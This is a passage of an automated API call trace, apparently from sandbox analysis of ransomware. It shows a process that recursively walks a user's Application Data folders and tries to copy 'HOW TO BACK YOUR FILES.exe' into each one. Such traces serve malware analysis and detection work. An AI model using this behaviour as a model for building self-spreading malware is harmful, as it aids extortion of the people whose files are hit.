ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.583] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.583] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0106.583] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.583] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0106.583] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31d160 | out: hHeap=0x2b0000) returned 1 [0106.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0106.583] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned 192 [0106.583] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.583] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.583] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.584] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.584] GetLastError () returned 0x0 [0106.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.584] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.584] CloseHandle (hObject=0x120) returned 1 [0106.584] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.584] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.585] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.585] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.585] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca068 | out: hHeap=0x2b0000) returned 1 [0106.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0106.585] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned 201 [0106.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.585] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.585] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.586] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.586] GetLastError () returned 0x0 [0106.586] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.586] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.586] CloseHandle (hObject=0x120) returned 1 [0106.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.586] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.586] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.587] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31cfc8 | out: hHeap=0x2b0000) returned 1 [0106.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0106.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 194 [0106.587] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.587] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.587] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.588] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.588] GetLastError () returned 0x0 [0106.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.588] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.588] CloseHandle (hObject=0x120) returned 1 [0106.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.588] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.588] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.588] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.589] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31cfc8 | out: hHeap=0x2b0000) returned 1 [0106.589] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0106.589] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 199 [0106.589] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.589] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.589] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.590] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.590] GetLastError () returned 0x0 [0106.590] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.590] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.590] CloseHandle (hObject=0x120) returned 1 [0106.590] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.590] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.590] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.590] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.591] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x330fc8 | out: hHeap=0x2b0000) returned 1 [0106.591] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0106.591] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 205 [0106.591] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.591] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.591] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.591] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.592] GetLastError () returned 0x0 [0106.592] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.592] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.592] CloseHandle (hObject=0x120) returned 1 [0106.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.592] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.592] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.592] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.592] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.592] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32cfc8 | out: hHeap=0x2b0000) returned 1 [0106.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0106.592] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 169 [0106.593] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.593] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.593] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.593] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.594] GetLastError () returned 0x0 [0106.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.594] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.594] CloseHandle (hObject=0x120) returned 1 [0106.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.594] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.594] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.594] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.594] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application 